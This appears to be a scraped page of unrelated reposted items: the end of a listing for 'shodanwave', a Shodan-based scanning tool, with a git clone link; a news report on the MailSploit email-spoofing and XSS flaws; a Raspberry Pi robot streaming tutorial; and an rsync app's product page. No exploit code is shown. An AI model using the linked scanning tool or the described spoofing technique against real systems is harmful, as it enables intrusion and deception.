--output OUTPUT Save the results Attention Use this tool wisely and not for evil. To get the best performece of this tool you need to pay for shodan to get full API access Options --limit and --offset may need a paying API key and consume query credits from your Shodan account. Disclaimer Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code. Download: sodanwave-master.zip git clone https://github.com/evilsocketbr/shodanwave.git Source: https://github.com/evilsocketbr/shodanwave
  22. If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system. A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms. Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others. Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse "From" header. Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with the forged sender address to trick recipients into believing they are receiving that email from a specific person. In a dedicated website went up today, Haddouche explained how the lack of input sanitization implemented by vulnerable email clients could lead to email spoofing attack—without actually exploiting any flaw in DMARC. To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to President of the United States. "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post. "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms." Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stems from the email spoofing issue. Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to MailSploit attack. However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 12 vendors did not yet comment on the researcher's report. Via thehackernews.com
  23. In this advanced project with the GoPiGo3 we build a Browser video streaming robot which streams live video to a browser and can be controlled from the browser. In this project we use a the Raspberry Pi Camera module with the GoPiGo3. You can control the robot using the a controller on the browser as the live video streams directly on the browser. The video quality is very good and the latency of the video is low, making this ideal for live video streaming robot projects. Hardware Needed A fully assembled GoPiGo3 A Raspberry Pi A Raspberry Pi Camera Module Connecting the Camera module Attach the Raspberry Pi camera module to the port on the Raspberry Pi. For more details on how to attach the camera, see our tutorial here. Setting up the GoPiGo Video Streaming Robot You should have cloned the GoPiGo3 github code onto your Raspberry Pi. Install the Pi Camera dependencies and Flask by running the install.sh script: sudo bash install.sh Reboot your Pi. Setup to Run on Boot You can run the server on boot so you don’t have to run it manually. Use the command install_startup.sh and this should start the flask server on boot. You should be able to connect to the robot using “http://dex.local:5000” or if using the Cinch setup, you can use “” You can setup Cinch, which will automatically setup a wifi access point, with the command sudo bash /home/pi/di_update/Raspbian_For_Robots/upd_script/wifi/cinch_setup.sh On reboot, connect to the WiFi service “Dex”. Running the Project Start the server by typing the following command: sudo python3 flask_server.py It’s going to take a couple of seconds for the server to fire up. A port and address will be shown in there. By default, the port is set to 5000 . If you have Raspbian For Robots installed, then going to http://dex.local:5000 address will be enough. Be sure you have your mobile device / laptop on the same network as your GoPiGo3 Otherwise, you won’t be able to access it. Source: https://www.dexterindustries.com/GoPiGo/projects/python-examples-for-the-raspberry-pi/browser-video-streaming-robot-gopigo3/
  24. Still using FTP? Truck hauls data 30x faster thanks to its modern rsync engine (included) which compresses, de-duplicates and encrypts – giving significantly higher performance and security, right from the first transfer. Setup takes 3 clicks (no command line), then just drag-and-drop to transfer. Unlock the performance of rsync with the simplicity of Truck. Jump to Videos | Screenshots | Features | Download now – free trial included Benchmarks 18x faster – uploading a new installation of WordPress. 30x faster – downloading a used instance of WordPress. 12x faster – sending an app to another computer in the office. No data was pre-existing at the destination, these were all first-time transfers – all gains are thanks to rsync’s compression and de-duplication. Comparisons were made versus the fastest FTP and SFTP apps for Mac, and native SMB sharing. Download now – free trial included Videos Screenshots Features – Upload and download via rsync by dragging-and-dropping. – Browse, rename, copy, move and delete remote files very quickly and easily. – Works over a securely encrypted SSH tunnel (no setup required). – Includes rsync 3.1.2 (no command-line interaction required). – Connects to any remote machine. – Checkboxes to quickly enable rsync’s most powerful features – such as backups/version-controlling, bandwidth-management, retention of partial transfers, etc. – Push-update the remote system’s version of rsync (includes precompiled binaries to suit a variety of remote machines). – Advanced GUI controls to selectively tune over 125 other rsync options. Even application-defined defaults can be overridden for a near-command-line level of control. – Autocompletion and inline documentation provided for each option. – Specify when the option applies (e.g. when uploading/downloading/both). – Enable ‘scavenging’: a preference to boost transfers by systematically employing rsync’s –copy-dest option; essentially reusing data from existing files in recently-visited directories. Fuzzy matching means that even files that are non-identical can be used as a basis for boosting. – Filter rules to include/exclude items based on text matching (or advanced pattern matching). – Toggle visibility of hidden files. – Specify ‘initial paths’ – for connecting straight into the given directory. – Fine tune custom preferences for each direction (upload/download) for each server. – Save multiple Favourites and work with multiple servers in multiple windows. – Bonjour browsing to easily connect to servers found nearby. – Use your SSH RSA private key instead of a password to connect to AWS, Google Cloud, etc. – An ‘Open Terminal Here’ action to quickly jump into an SSH session in Terminal.app – pre-authenticated and ready in the right directory. – Detailed operation logging. – Filter any view of files and use the keyboard to navigate. Certified for use with: – Google Cloud. – Amazon AWS. – Dreamhost. – (And works with any other service provider offering standard rsync-over-SSH.) Other features in the pipe: – Native rsync protocol support (in addition to the current rsync-over-ssh). – Scheduled transfers. – A ‘get info’ panel with full support for ownership and permissions management. – A history panel with granular operation logging. System Requirements Compatible with: – Mac OS X 10.8 (Mountain Lion and Mountain Lion Server) – Mac OS X 10.9 (Mavericks and Mavericks Server) – Mac OS X 10.10 (Yosemite and Yosemite Server) – Mac OS X 10.11 (El Capitan and El Capitan Server) – macOS 10.12 (Sierra and Sierra Server) – macOS 10.13 (High Sierra and High Sierra Server) The remote machine must have a running SSH service and carry its own copy of rsync. Macs have this as standard. Therefore, to connect to a remote Mac, simply enable ‘Remote Login’ in its System Preferences. Download Click here to download (21MB) – free trial included. Source: http://bonhardcomputing.com/truck/#2017-12-04
  25. Black Friday